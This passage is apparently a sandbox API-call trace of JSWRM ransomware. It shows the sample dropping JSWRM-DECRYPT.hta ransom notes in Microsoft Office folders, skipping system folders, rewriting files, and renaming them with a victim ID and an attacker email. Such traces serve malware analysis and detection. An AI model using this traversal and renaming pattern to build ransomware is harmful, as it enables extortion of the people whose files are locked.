lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\lt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\lt\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.706] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.706] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.707] CloseHandle (hObject=0x238) returned 1 [0136.707] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\lt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\lt\\jswrm-decrypt.hta")) returned 0x20 [0136.707] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\lt\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1bce2f5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1bf45a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4823e57f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0136.707] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.707] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1bce2f5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1bf45a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4823e57f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.707] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.707] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.707] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4823e57f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4823e57f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x48263992, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.707] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.707] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.707] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.708] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.708] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.708] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.708] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.708] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.708] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.708] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.708] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1bf45a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1bf45a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1bf45a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5098, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.708] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.708] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.708] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.708] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.708] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.708] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.708] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.708] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.708] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.708] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\lt\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\lt\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.709] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=20632) returned 1 [0136.709] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.709] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5090, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5090, lpOverlapped=0x0) returned 1 [0136.712] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.712] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5090, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5090, lpOverlapped=0x0) returned 1 [0136.712] CloseHandle (hObject=0x314) returned 1 [0136.712] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\lt\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\lt\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\lt\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\lt\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.713] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1bf45a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1bf45a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1bf45a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5098, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.713] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0136.713] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf13037fa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf13037fa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="lv", cAlternateFileName="")) returned 1 [0136.713] lstrcmpiW (lpString1="lv", lpString2=".") returned 1 [0136.713] lstrcmpiW (lpString1="lv", lpString2="..") returned 1 [0136.713] lstrcmpiW (lpString1="lv", lpString2="...") returned 1 [0136.713] lstrcmpiW (lpString1="lv", lpString2="windows") returned -1 [0136.713] lstrcmpiW (lpString1="lv", lpString2="recovery") returned -1 [0136.713] lstrcmpiW (lpString1="lv", lpString2="perflogs") returned -1 [0136.713] lstrcmpiW (lpString1="lv", lpString2="documents and settings") returned 1 [0136.713] lstrcmpiW (lpString1="lv", lpString2="$RECYCLE.BIN") returned 1 [0136.713] lstrcmpiW (lpString1="lv", lpString2="system volume information") returned -1 [0136.713] lstrcmpiW (lpString1="lv", lpString2="msocache") returned -1 [0136.714] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\lv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\lv\\jswrm-decrypt.hta")) returned 0xffffffff [0136.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.714] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\lv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\lv\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.715] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.715] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.716] CloseHandle (hObject=0x238) returned 1 [0136.716] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\lv\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\lv\\jswrm-decrypt.hta")) returned 0x20 [0136.716] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\lv\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf13037fa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x48263992, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x232040 [0136.716] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.716] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf13037fa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x48263992, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.717] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.717] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.717] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48263992, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x48263992, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x48263992, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.717] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.717] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf13037fa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1329a43, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5498, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.717] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.717] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.717] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.717] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.717] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.717] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.717] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.717] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.717] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.717] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\lv\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\lv\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.718] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21656) returned 1 [0136.718] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.718] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5490, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5490, lpOverlapped=0x0) returned 1 [0136.723] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.723] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5490, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5490, lpOverlapped=0x0) returned 1 [0136.724] CloseHandle (hObject=0x314) returned 1 [0136.724] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\lv\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\lv\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\lv\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\lv\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.725] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf13037fa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1329a43, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5498, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.725] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0136.725] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc21a8ad, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc21a8ad, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc21a8ad, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ms", cAlternateFileName="")) returned 1 [0136.725] lstrcmpiW (lpString1="ms", lpString2=".") returned 1 [0136.726] lstrcmpiW (lpString1="ms", lpString2="..") returned 1 [0136.726] lstrcmpiW (lpString1="ms", lpString2="...") returned 1 [0136.726] lstrcmpiW (lpString1="ms", lpString2="windows") returned -1 [0136.726] lstrcmpiW (lpString1="ms", lpString2="recovery") returned -1 [0136.726] lstrcmpiW (lpString1="ms", lpString2="perflogs") returned -1 [0136.726] lstrcmpiW (lpString1="ms", lpString2="documents and settings") returned 1 [0136.726] lstrcmpiW (lpString1="ms", lpString2="$RECYCLE.BIN") returned 1 [0136.726] lstrcmpiW (lpString1="ms", lpString2="system volume information") returned -1 [0136.726] lstrcmpiW (lpString1="ms", lpString2="msocache") returned -1 [0136.726] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ms\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ms\\jswrm-decrypt.hta")) returned 0xffffffff [0136.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.726] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ms\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ms\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.727] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.727] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: 